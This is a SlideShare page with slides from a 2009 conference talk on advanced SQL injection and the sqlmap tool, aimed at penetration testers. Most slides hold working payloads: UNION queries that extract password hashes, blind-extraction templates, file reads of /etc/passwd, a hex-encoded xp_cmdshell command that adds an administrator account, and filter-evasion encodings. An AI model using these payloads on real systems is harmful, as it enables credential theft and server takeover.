Se ha denunciado esta presentación.
Utilizamos tu perfil de LinkedIn y tus datos de actividad para personalizar los anuncios y mostrarte publicidad más relevante. Puedes cambiar tus preferencias de publicidad en cualquier momento.
SQL injection: Not Only AND 1=1
  Bernardo Damele Assumpção Guimarães
Who I am

 Bernardo Damele Assumpção Guimarães

     Proud father

     Penetration tester / security researcher
         ...
SQL injection definition

     SQL injection attacks are a type of injection attack, in
     which SQL commands are inject...
How does it work?

     Detection of a possible SQL injection flaw

     Back-end database management system
     fingerpr...
sqlmap – http://sqlmap.sourceforge.net

     Open source command-line automatic tool

     Detect and exploit SQL injectio...
sqlmap key features

     Full support for MySQL, Oracle, PostgreSQL and
     Microsoft SQL Server

     Three SQL injecti...
sqlmap key features

     Dump entire or user specified database table entries

     Run own SQL statements

     Read eit...
Database management system fingerprint

     sqlmap implements up to four techniques:

          Inband error messages

  ...
Database management system fingerprint

     Example of basic back-end DBMS fingerprint on
     Oracle 10g Express Edition...
Database management system fingerprint

     Example of extensive back-end DBMS fingerprint
     on Microsoft SQL Server 2...
Database management system fingerprint

     Examples of SQL dialect fingerprint:

          On MySQL:

           /*!5006...
More on fingerprint

     Fingerprinting is a key step in penetration
     testing
          It is not only about back-end...
More on fingerprint

     sqlmap can fingerprint them without making
     extra requests:

         Web/application server...
SQL statement syntax

     Identify the web application query syntax is
     mandatory

     It is needed to correctly exp...
SQL statement syntax

     Possible exploitation vector:

      page.php?id=1'))) AND ((('RaNd' LIKE 'RaNd


     For a bo...
SQL statement syntax

     For a UNION query SQL injection exploit:

      1'))) UNION ALL SELECT NULL,
      Concatenated...
Bypass number of columns limitation

     You’ve got a SQL injection point vulnerable to
     UNION query technique detect...
Bypass number of columns limitation

     Concatenate your SELECT statement columns
     with random delimiters in a singl...
Bypass number of columns limitation

     SELECT usename, passwd FROM pg_shadow

                                         ...
Single entry UNION query SQL injection

     You’ve got a parameter vulnerable to UNION
     query SQL injection

     The...
Single entry UNION query SQL injection

     Inspect and unpack the SQL injection statement:

          Calculate its outp...
Single entry UNION query SQL injection

     Example on MySQL 4.1 to enumerate the list of
     databases:

     SELECT db...
Single entry UNION query SQL injection

     Another technique consists of retrieving
     entries as a single string

   ...
Getting a SQL shell

     sqlmap has options to enumerate / dump
     different types of data from the back-end DBMS

    ...
SQL injection: Not only WHERE clause

     Most of the SQL injections occur within the
     WHERE clause, but GROUP BY, OR...
SQL injection in GROUP BY clause

     Example on MySQL 5.0:

     "SELECT id, name FROM users GROUP BY "
     . $_GET['id...
SQL injection in ORDER BY clause

     Example on PostgreSQL 8.2:

     "SELECT id, name FROM users ORDER BY "
     . $_GE...
SQL injection in LIMIT clause

     Example on MySQL 6.0:

     "SELECT id, name FROM users LIMIT 0, "
     . $_GET['id']
...
SQL injection payloads to bypass filters

     There are numerous techniques to bypass:

         Web application language...
PHP Magic Quotes misuse: Bypass

     You’ve a SQL injection point in a GET, POST
     parameter or Cookie value

     Web...
PHP Magic Quotes misuse: Bypass

     Original statement:
         "SELECT name, surname FROM users WHERE
         name='"...
PHP Magic Quotes misuse: Bypass

     For a UNION query SQL injection exploit:
      SELECT name, surname FROM users WHERE...
PHP Magic Quotes bypass: Avoid single quotes

     Example on MySQL:
        LOAD_FILE('/etc/passwd')

                   ...
Bypass with percentage char on ASP

     ASP ignores % if not followed by a valid pair of
     characters

     Example on...
Bypass by hex-encoding the SQL statement

     Example on Microsoft SQL Server:
     exec master..xp_cmdshell 'NET USER my...
Bypass by comments as separators

     Example on MySQL:

     SELECT user, password FROM mysql.user

                    ...
Bypass by random mixed case payload

     Example on Oracle 10g:

     SELECT banner FROM v$version WHERE
     ROWNUM=1

 ...
Bypass by random URI encoded payload

     Example on PostgreSQL:

     SELECT schemaname FROM pg_tables

                ...
SQL injection to operating system full control

     We’ve seen how to detect and exploit different
     SQL injection fla...
Credits

     Chip Andrews, www.sqlsecurity.com

     Alberto Revelli, sqlninja.sourceforge.net

     Sumit Siddharth, www...
Questions?




     Bernardo Damele Assumpção Guimarães
                      bernardo.damele@gmail.com
                  ...
Próximo SlideShare
Cargando en…5
×

de

SQL injection: Not Only AND 1=1 (updated) Slide 1 SQL injection: Not Only AND 1=1 (updated) Slide 2 SQL injection: Not Only AND 1=1 (updated) Slide 3 SQL injection: Not Only AND 1=1 (updated) Slide 4 SQL injection: Not Only AND 1=1 (updated) Slide 5 SQL injection: Not Only AND 1=1 (updated) Slide 6 SQL injection: Not Only AND 1=1 (updated) Slide 7 SQL injection: Not Only AND 1=1 (updated) Slide 8 SQL injection: Not Only AND 1=1 (updated) Slide 9 SQL injection: Not Only AND 1=1 (updated) Slide 10 SQL injection: Not Only AND 1=1 (updated) Slide 11 SQL injection: Not Only AND 1=1 (updated) Slide 12 SQL injection: Not Only AND 1=1 (updated) Slide 13 SQL injection: Not Only AND 1=1 (updated) Slide 14 SQL injection: Not Only AND 1=1 (updated) Slide 15 SQL injection: Not Only AND 1=1 (updated) Slide 16 SQL injection: Not Only AND 1=1 (updated) Slide 17 SQL injection: Not Only AND 1=1 (updated) Slide 18 SQL injection: Not Only AND 1=1 (updated) Slide 19 SQL injection: Not Only AND 1=1 (updated) Slide 20 SQL injection: Not Only AND 1=1 (updated) Slide 21 SQL injection: Not Only AND 1=1 (updated) Slide 22 SQL injection: Not Only AND 1=1 (updated) Slide 23 SQL injection: Not Only AND 1=1 (updated) Slide 24 SQL injection: Not Only AND 1=1 (updated) Slide 25 SQL injection: Not Only AND 1=1 (updated) Slide 26 SQL injection: Not Only AND 1=1 (updated) Slide 27 SQL injection: Not Only AND 1=1 (updated) Slide 28 SQL injection: Not Only AND 1=1 (updated) Slide 29 SQL injection: Not Only AND 1=1 (updated) Slide 30 SQL injection: Not Only AND 1=1 (updated) Slide 31 SQL injection: Not Only AND 1=1 (updated) Slide 32 SQL injection: Not Only AND 1=1 (updated) Slide 33 SQL injection: Not Only AND 1=1 (updated) Slide 34 SQL injection: Not Only AND 1=1 (updated) Slide 35 SQL injection: Not Only AND 1=1 (updated) Slide 36 SQL injection: Not Only AND 1=1 (updated) Slide 37 SQL injection: Not Only AND 1=1 (updated) Slide 38 SQL injection: Not Only AND 1=1 (updated) Slide 39 SQL injection: Not Only AND 1=1 (updated) Slide 40 SQL injection: Not Only AND 1=1 (updated) Slide 41
Próximo SlideShare
Advanced SQL injection to operating system full control (whitepaper)
Siguiente
Descargar para leer sin conexión y ver en pantalla completa.

42 recomendaciones

Compartir

Descargar para leer sin conexión

SQL injection: Not Only AND 1=1 (updated)

Descargar para leer sin conexión

The presentation has a quick preamble on SQL injection definition, sqlmap and its key features.
I will then illustrate into details common and uncommon problems and respective solutions with examples that a penetration tester faces when he wants to take advantage of any kind of web application SQL injection flaw on real world web applications, for instance SQL injection in ORDER BY and LIMIT clauses, single entry UNION query SQL injection, specific web application technologies IDS bypasses and more.

These slides have been presented at the 2nd Digital Security Forum in Lisbon on June 27, 2009.

Updated version of http://www.slideshare.net/inquis/sql-injection-not-only-and-11.

Libros relacionados

Gratis con una prueba de 30 días de Scribd

Ver todo

Audiolibros relacionados

Gratis con una prueba de 30 días de Scribd

Ver todo

SQL injection: Not Only AND 1=1 (updated)

  1. 1. SQL injection: Not Only AND 1=1 Bernardo Damele Assumpção Guimarães
  2. 2. Who I am Bernardo Damele Assumpção Guimarães Proud father Penetration tester / security researcher Portcullis Computer Security Ltd Open source projects sqlmap lead developer MySQL UDF repository developer Metasploit contributor 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 2
  3. 3. SQL injection definition SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL statements It is a common threat in web applications that lack of proper sanitization on user-supplied input used in SQL queries It does not affect only web applications! A long list of resources can be found on my delicious profile, http://delicious.com/inquis/sqlinjection 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 3
  4. 4. How does it work? Detection of a possible SQL injection flaw Back-end database management system fingerprint SQL injection vulnerability can lead to: DBMS data exfiltration and manipulation File system read and write access Operating system control 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 4
  5. 5. sqlmap – http://sqlmap.sourceforge.net Open source command-line automatic tool Detect and exploit SQL injection flaws in web applications Developed in Python since July 2006 Released under GPLv2 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 5
  6. 6. sqlmap key features Full support for MySQL, Oracle, PostgreSQL and Microsoft SQL Server Three SQL injection techniques: Boolean-based blind UNION query Batched (stacked) queries Perform an extensive back-end DBMS fingerprint Enumerate users, password hashes, privileges, databases, tables, columns and their data-type 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 6
  7. 7. sqlmap key features Dump entire or user specified database table entries Run own SQL statements Read either text or binary files from the file system Execute arbitrary commands on the operating system Establish an out-of-band stateful connection between the attacker box and the database server 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 7
  8. 8. Database management system fingerprint sqlmap implements up to four techniques: Inband error messages Banner (version(), @@version, …) parsing SQL dialect Specific functions static output comparison 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 8
  9. 9. Database management system fingerprint Example of basic back-end DBMS fingerprint on Oracle 10g Express Edition: Two techniques: Specific variables Specific functions static output comparison The two possible queries to fingerprint it are: AND ROWNUM=ROWNUM AND LENGTH(SYSDATE)=LENGTH(SYSDATE) 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 9
  10. 10. Database management system fingerprint Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005: Three techniques: Active fingerprint: Microsoft SQL Server 2005 Banner parsing fingerprint: Microsoft SQL Server 2005 Service Pack 0 version 9.00.1399 HTML error message fingerprint: Microsoft SQL Server Active fingerprint refers to specific functions’ static output comparison in this example 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 10
  11. 11. Database management system fingerprint Examples of SQL dialect fingerprint: On MySQL: /*!50067 AND 47=47 */ On PostgreSQL: AND 82::int=82 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 11
  12. 12. More on fingerprint Fingerprinting is a key step in penetration testing It is not only about back-end DBMS software There are techniques and tools to fingerprint the web server, the web application technology and their underlying system What about the back-end DBMS underlying operating system? 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 12
  13. 13. More on fingerprint sqlmap can fingerprint them without making extra requests: Web/application server and web application technology: by parsing the HTTP response headers Known basic technique Back-end DBMS operating system: by parsing the DBMS banner Over-looked technique 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 13
  14. 14. SQL statement syntax Identify the web application query syntax is mandatory It is needed to correctly exploit the flaw Example: "SELECT id, user FROM users WHERE id LIKE ((('%" . $_GET['id'] . "%'))) LIMIT 0, 1" 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 14
  15. 15. SQL statement syntax Possible exploitation vector: page.php?id=1'))) AND ((('RaNd' LIKE 'RaNd For a boolean-based blind SQL injection exploit: 1'))) AND ORD(MID((SQL query), Nth SQL query output character, 1)) > Bisection algorithm number AND ((('RaNd' LIKE 'RaNd 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 15
  16. 16. SQL statement syntax For a UNION query SQL injection exploit: 1'))) UNION ALL SELECT NULL, Concatenated SQL query# AND ((('RaNd' LIKE 'RaNd For a batched query SQL injection exploit: 1'))); SQL query;# AND ((('RaNd' LIKE 'RaNd 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 16
  17. 17. Bypass number of columns limitation You’ve got a SQL injection point vulnerable to UNION query technique detected by: ORDER BY clause brute-forcing NULL brute-forcing Sequential number brute-forcing The number of columns in the SELECT statement is fewer than the number of columns that you want to inject 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 17
  18. 18. Bypass number of columns limitation Concatenate your SELECT statement columns with random delimiters in a single output Example: The original SELECT statement has only one column SELECT col FROM tbl WHERE id=1 Back-end DBMS is PostgreSQL 8.3 We want to retrieve users’ password hashes 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 18
  19. 19. Bypass number of columns limitation SELECT usename, passwd FROM pg_shadow ↓ UNION ALL SELECT, CHR(109)||CHR(107)||CHR(100)||CHR(83)||CHR (68)||CHR(111)||COALESCE(CAST(usename AS CHARACTER(10000)), CHR(32))||CHR(80)||CHR(121)||CHR(80)||CHR( 121)||CHR(66)||CHR(109)||COALESCE(CAST(pas swd AS CHARACTER(10000)), CHR(32))||CHR(104)||CHR(108)||CHR(74)||CHR (103)||CHR(107)||CHR(90), FROM pg_shadow-- 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 19
  20. 20. Single entry UNION query SQL injection You’ve got a parameter vulnerable to UNION query SQL injection The page displays only the query’s first entry output Change the parameter value to its negative value or append a false AND condition to the original parameter value Cause the original query to produce no output 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 20
  21. 21. Single entry UNION query SQL injection Inspect and unpack the SQL injection statement: Calculate its output number of entries Limit it to return one entry at a time Repeat the previous action N times where N is the number of output entries 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 21
  22. 22. Single entry UNION query SQL injection Example on MySQL 4.1 to enumerate the list of databases: SELECT db FROM mysql.db ↓ SELECT … WHERE id=1 AND 3=2 UNION ALL SELECT CONCAT(CHAR(100,84,71,69,87,98),IFNULL(CAST(db AS CHAR(10000)), CHAR(32)), CHAR(65,83,118,81,87,116)) FROM mysql.db LIMIT Nth, 1# AND 6972=6972 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 22
  23. 23. Single entry UNION query SQL injection Another technique consists of retrieving entries as a single string Example on MySQL 5.0: SELECT user, password FROM mysql.user ↓ SELECT GROUP_CONCAT(CONCAT(user, 'RaND', password)) FROM mysql.user 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 23
  24. 24. Getting a SQL shell sqlmap has options to enumerate / dump different types of data from the back-end DBMS It also allows the user to run custom SQL queries It inspects the provided statement: SELECT: it goes blind or UNION query to retrieve the output DDL, DML, etc: it goes batched query to run it 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 24
  25. 25. SQL injection: Not only WHERE clause Most of the SQL injections occur within the WHERE clause, but GROUP BY, ORDER BY and LIMIT can also be affected SQL injection within these clauses can be exploited to perform a blind injection or, in some cases, a UNION query injection In all cases batched query injection is possible 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 25
  26. 26. SQL injection in GROUP BY clause Example on MySQL 5.0: "SELECT id, name FROM users GROUP BY " . $_GET['id'] ↓ SELECT id, name FROM users GROUP BY 1, (SELECT (CASE WHEN (condition) THEN 1 ELSE 1*(SELECT table_name FROM information_schema.tables) END)) 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 26
  27. 27. SQL injection in ORDER BY clause Example on PostgreSQL 8.2: "SELECT id, name FROM users ORDER BY " . $_GET['id'] ↓ SELECT id, name FROM users ORDER BY 1, (SELECT (CASE WHEN (condition) THEN 1 ELSE 1/0 END)) 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 27
  28. 28. SQL injection in LIMIT clause Example on MySQL 6.0: "SELECT id, name FROM users LIMIT 0, " . $_GET['id'] ↓ SELECT id, name FROM users LIMIT 0, 1 UNION ALL SELECT (CASE WHEN (condition) THEN 1 ELSE 1*(SELECT table_name FROM information_schema.tables) END), NULL 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 28
  29. 29. SQL injection payloads to bypass filters There are numerous techniques to bypass: Web application language security settings Web application firewalls Intrusion [Detection|Prevention] Systems Web server security settings These techniques can be combined 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 29
  30. 30. PHP Magic Quotes misuse: Bypass You’ve a SQL injection point in a GET, POST parameter or Cookie value Web application language is PHP magic_quotes_gpc setting is On or addslashes() is used within the source code Back-end DBMS is either Microsoft SQL Server or Oracle Their escaping character for single quote is single quote 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 30
  31. 31. PHP Magic Quotes misuse: Bypass Original statement: "SELECT name, surname FROM users WHERE name='" . $_GET['name'] . "'" Example of a successful exploit: foobar' OR 10>4-- Query passed by PHP to the back-end DBMS: SELECT name, surname FROM users WHERE name='foobar' OR 10>4--' 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 31
  32. 32. PHP Magic Quotes misuse: Bypass For a UNION query SQL injection exploit: SELECT name, surname FROM users WHERE name='foobar' UNION ALL SELECT NAME, PASSWORD FROM SYS.USER$--' For a boolean-based blind SQL injection exploit: SELECT name, surname FROM users WHERE name='foobar' OR ASCII(SUBSTR((SQL query), Nth SQL query output char, 1)) > Bisection algorithm number--' 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 32
  33. 33. PHP Magic Quotes bypass: Avoid single quotes Example on MySQL: LOAD_FILE('/etc/passwd') ↓ LOAD_FILE(CHAR(47,101,116,99,47,112,97, 115,115,119,100)) or LOAD_FILE(0x2f6574632f706173737764) It is not limited to bypass only PHP Magic Quotes 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 33
  34. 34. Bypass with percentage char on ASP ASP ignores % if not followed by a valid pair of characters Example on ASP with back-end DBMS PostgreSQL: SELECT pg_sleep(3) ↓ S%ELEC%T %p%g_sle%ep(%3) 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 34
  35. 35. Bypass by hex-encoding the SQL statement Example on Microsoft SQL Server: exec master..xp_cmdshell 'NET USER myuser mypass /ADD & NET LOCALGROUP Administrators myuser /ADD' ↓ DECLARE @rand varchar(8000) SET @rand = 0x65786563206d61737465722e2e78705f636d6473 68656c6c20274e45542055534552206d7975736572 206d7970617373202f4144442026204e4554204c4f 43414c47524f55502041646d696e6973747261746f 7273206d7975736572202f41444427; EXEC (@rand) 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 35
  36. 36. Bypass by comments as separators Example on MySQL: SELECT user, password FROM mysql.user ↓ SELECT/*R_aNd*/user/*rA.Nd*/,/*Ran|D */password/*r+anD*/FROM/*rAn,D*/mysq l.user 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 36
  37. 37. Bypass by random mixed case payload Example on Oracle 10g: SELECT banner FROM v$version WHERE ROWNUM=1 ↓ SeLEcT BaNneR FroM v$vERsIon WhERe ROwNUm=1 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 37
  38. 38. Bypass by random URI encoded payload Example on PostgreSQL: SELECT schemaname FROM pg_tables ↓ %53E%4c%45%43T%20%73%63h%65%6d%61%6e a%6de%20%46%52O%4d%20%70g%5f%74a%62% 6ce%73 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 38
  39. 39. SQL injection to operating system full control We’ve seen how to detect and exploit different SQL injection flaws, retrieve and manipulate data on the DBMS and bypass web application filters… what else? Check my recent research about compromising the underlying file system and the operating system via SQL injection on http://tinyurl.com/sqlmap1 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 39
  40. 40. Credits Chip Andrews, www.sqlsecurity.com Alberto Revelli, sqlninja.sourceforge.net Sumit Siddharth, www.notsosecure.com Alessandro Tanasi, lab.lonerunners.net Ralf Braga, www.linkedin.com/in/ralfbraga 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 40
  41. 41. Questions? Bernardo Damele Assumpção Guimarães bernardo.damele@gmail.com http://bernardodamele.blogspot.com http://sqlmap.sourceforge.net Thanks for your attention! 2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009 41
  • JosephHill60

    Mar. 6, 2020
  • YohsukeYamazaki

    Aug. 21, 2019
  • OzanyaRavindranathan

    Jul. 2, 2019
  • ShahidulIslam296

    Apr. 11, 2019
  • AMADOUMOUSSAIBRAHIM1

    Apr. 1, 2019
  • GenR_18

    Nov. 24, 2018
  • magnologan

    Oct. 25, 2017
  • YamikMistry

    Sep. 14, 2017
  • AnwarSadat20

    Sep. 9, 2017
  • ssuseraf0f3b

    Mar. 9, 2017
  • itsuifeng

    Sep. 7, 2016
  • jeffhuangus

    May. 7, 2016
  • andrewgerst

    Mar. 17, 2016
  • pardeepbattu

    Dec. 7, 2015
  • laneycln

    Sep. 17, 2015
  • sayedhayatullahghazanfar

    Sep. 3, 2015
  • Mhmmv

    May. 2, 2015
  • ANSHRULZ

    Oct. 25, 2014
  • adamburan

    Jul. 30, 2014
  • DemoPhyo

    Jun. 2, 2014

The presentation has a quick preamble on SQL injection definition, sqlmap and its key features. I will then illustrate into details common and uncommon problems and respective solutions with examples that a penetration tester faces when he wants to take advantage of any kind of web application SQL injection flaw on real world web applications, for instance SQL injection in ORDER BY and LIMIT clauses, single entry UNION query SQL injection, specific web application technologies IDS bypasses and more. These slides have been presented at the 2nd Digital Security Forum in Lisbon on June 27, 2009. Updated version of http://www.slideshare.net/inquis/sql-injection-not-only-and-11.

Vistas

Total de vistas

33.867

En Slideshare

0

De embebidos

0

Número de embebidos

546

Acciones

Descargas

1.840

Compartidos

0

Comentarios

0

Me gusta

42

×